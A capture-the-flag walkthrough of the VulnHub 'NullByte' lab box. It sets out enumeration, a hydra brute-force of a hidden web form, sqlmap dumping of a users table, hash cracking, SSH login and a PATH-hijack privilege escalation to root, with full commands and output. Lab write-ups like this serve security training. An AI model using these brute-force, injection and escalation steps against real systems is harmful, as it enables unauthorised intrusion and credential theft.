VulnHub: NullByte Walkthrough
NullByte is another intentionally vulnerable box on VulnHub by lyon.
Enumeration
Starting enumeration with AutoRecon.
Nmap scan report for 192.168.50.152
Host is up, received arp-response (0.0022s latency).
Scanned at 2022-01-01 18:16:43 EST for 12s
Not shown: 997 closed ports
Reason: 997 resets
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.10 ((Debian))
111/tcp open rpcbind syn-ack ttl 64 2-4 (RPC #100000)
777/tcp open ssh syn-ack ttl 64 OpenSSH 6.7p1 Debian 5 (protocol 2.0)
46581/tcp open status syn-ack ttl 64 1 (RPC #100024)
SSH is being redirected on port 777. Starting with Port 80.
Index page consists of a gif with a message like the one in article cover. Nothing in the source code or any links to click.
Looking at the dirbusting results:
200 10l 28w 196c http://192.168.50.152/index.html
301 9l 28w 321c http://192.168.50.152/javascript
301 9l 28w 321c http://192.168.50.152/phpmyadmin
403 11l 32w 302c http://192.168.50.152/server-status
301 9l 28w 318c http://192.168.50.152/uploads
/index.html has the gif with message.
/javascript is forbidden.
/server-status is forbidden.
/phpmyadmin has the login form but default creds do not work.
/uploads says it has directory listing not allowed.
So, we are back at where we started.
We tried gobuster on /uploads too with different lists but did not turn up anything.
Had hit a dead end, but there has to be something with which we can move forward.
All we had was a gif and phpmyadmin login form which I could bruteforce.
Googled a bit and came to know that gif can be passed to strings command.
┌──(root💀kali)-[~]
└─# strings index.gif
GIF89a
P-): kzMb5nVYJw
cccIII@@@GGG444999```<<<
ooo>>>EEE
???^^^
HHH;;;
Found a string and tried /kzMb5nVYJw which worked.
We have a form with a single field, did some trial and error, at last ran hydra to brute force it with rockyou.txt
┌──(root💀kali)-[~]
└─# hydra 192.168.50.152 http-form-post "/kzMb5nVYJw/index.php:key=^PASS^:invalid key" -l ignore -P rockyou.txt
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-01-02 17:11:39
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task
[DATA] attacking http-post-form://192.168.50.152:80/kzMb5nVYJw/index.php:key=^PASS^:invalid key
[STATUS] 4154.00 tries/min, 4154 tries in 00:01h, 14340244 to do in 57:33h, 16 active
[STATUS] 4278.67 tries/min, 12836 tries in 00:03h, 14331562 to do in 55:50h, 16 active
[80][http-post-form] host: 192.168.50.152 login: ignore password: elite
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-01-02 17:17:42
elite is the key.
We get another form asking for username, pressing enter would give away all the data, so it is vulnerable to sql injection.
Fire up burp, intercept the GET request and save it in a file and pass it to sqlmap.
┌──(root💀kali)-[/home/kali/Desktop]
└─# sqlmap -r getReq.txt --dbs
___
__H__
___ ___[)]_____ ___ ___ {1.5.10#stable}
|_ -| . [)] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 17:44:14 /2022-01-02/
[17:44:14] [INFO] parsing HTTP request from 'getReq.txt'
[17:44:16] [WARNING] provided value for parameter 'usrtosearch' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[17:44:16] [INFO] testing connection to the target URL
--snip--
[17:44:46] [INFO] fetching database names
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] seth
seth is the only user generated database.
┌──(root💀kali)-[/home/kali/Desktop]
└─# sqlmap -r getReq.txt -D seth --tables
___
__H__
___ ___["]_____ ___ ___ {1.5.10#stable}
|_ -| . [.] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
Database: seth
[1 table]
+-------+
| users |
+-------+
There's only one table in seth.
┌──(root💀kali)-[/home/kali/Desktop]
└─# sqlmap -r getReq.txt -D seth -T users --dump-all 2 ⨯
___
__H__
___ ___[.]_____ ___ ___ {1.5.10#stable}
|_ -| . ["] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
Database: seth
Table: users
[2 entries]
+----+---------------------------------------------+--------+------------+
| id | pass | user | position |
+----+---------------------------------------------+--------+------------+
| 1 | YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE | ramses | <blank> |
| 2 | --not allowed-- | isis | employee |
+----+---------------------------------------------+--------+------------+
We find a password hash for user ramses.
We use hashes.com to identify hash type. It is a base64 encoded string, when decoded, we'll get a md5 hash which can be cracked with crackstation.net .
The password is omega.
Initial Foothold
We ssh into nullbyte as ramses.
┌──(root💀kali)-[/home/kali/Desktop]
└─# ssh ramses@192.168.50.152 -p 777
The authenticity of host '[192.168.50.152]:777 ([192.168.50.152]:777)' can't be established.
ECDSA key fingerprint is SHA256:H/Y/TKggtnCfMGz457Jy6F6tUZPrvEDD62dP9A3ZIkU.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.50.152]:777' (ECDSA) to the list of known hosts.
ramses@192.168.50.152's password:
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Aug 2 01:38:58 2015 from 192.168.1.109
ramses@NullByte:~$
Privilige Escalation
A little more enumeration.
ramses@NullByte:~$ sudo -l
[sudo] password for ramses:
Sorry, user ramses may not run sudo on NullByte.
ramses@NullByte:~$ cat .bash_history
sudo -s
su eric
exit
ls
clear
cd /var/www
cd backup/
ls
./procwatch
clear
sudo -s
cd /
ls
exit
No sudo permissions but bash_history is readable.
Ramses ran a procwatch in /var/www/backup.
Its a lot of gibberish when read but when its executed, it is executing ps and sh command.
We can make another executable binary with /bin/sh in it and add its location in the path.
ramses@NullByte:/var/www/backup$ echo /bin/sh > ps
ramses@NullByte:/var/www/backup$ chmod +x ps
ramses@NullByte:/var/www/backup$ cat ps
/bin/sh
ramses@NullByte:/var/www/backup$ export PATH=/var/www/backup:${PATH}
ramses@NullByte:/var/www/backup$ echo $PATH
/var/www/backup:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
In this way, when procwatch is executed, ps will be called, the system will look in the path and the first one will be in backup folder which will be executed.
Execute procwatch.
ramses@NullByte:/var/www/backup$ ./procwatch
# whoami
root
Voila! We are root.
Get the root flag.
# cat proof.txt
adf11c7a9e6523e630aaf3b9b7acb51d
It seems that you have pwned the box, congrats.
Now you done that I wanna talk with you. Write a walk & mail at
xly0n@sigaint.org attach the walk and proof.txt
If sigaint.org is down you may mail at nbsly0n@gmail.com
USE THIS PGP PUBLIC KEY
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: BCPG C# v1.6.1.0
mQENBFW9BX8BCACVNFJtV4KeFa/TgJZgNefJQ+fD1+LNEGnv5rw3uSV+jWigpxrJ
Q3tO375S1KRrYxhHjEh0HKwTBCIopIcRFFRy1Qg9uW7cxYnTlDTp9QERuQ7hQOFT
e4QU3gZPd/VibPhzbJC/pdbDpuxqU8iKxqQr0VmTX6wIGwN8GlrnKr1/xhSRTprq
Cu7OyNC8+HKu/NpJ7j8mxDTLrvoD+hD21usssThXgZJ5a31iMWj4i0WUEKFN22KK
+z9pmlOJ5Xfhc2xx+WHtST53Ewk8D+Hjn+mh4s9/pjppdpMFUhr1poXPsI2HTWNe
YcvzcQHwzXj6hvtcXlJj+yzM2iEuRdIJ1r41ABEBAAG0EW5ic2x5MG5AZ21haWwu
Y29tiQEcBBABAgAGBQJVvQV/AAoJENDZ4VE7RHERJVkH/RUeh6qn116Lf5mAScNS
HhWTUulxIllPmnOPxB9/yk0j6fvWE9dDtcS9eFgKCthUQts7OFPhc3ilbYA2Fz7q
m7iAe97aW8pz3AeD6f6MX53Un70B3Z8yJFQbdusbQa1+MI2CCJL44Q/J5654vIGn
XQk6Oc7xWEgxLH+IjNQgh6V+MTce8fOp2SEVPcMZZuz2+XI9nrCV1dfAcwJJyF58
kjxYRRryD57olIyb9GsQgZkvPjHCg5JMdzQqOBoJZFPw/nNCEwQexWrgW7bqL/N8
TM2C0X57+ok7eqj8gUEuX/6FxBtYPpqUIaRT9kdeJPYHsiLJlZcXM0HZrPVvt1HU
Gms=
=PiAQ
-----END PGP PUBLIC KEY BLOCK-----
And there goes our root flag.
Thanks for reading.
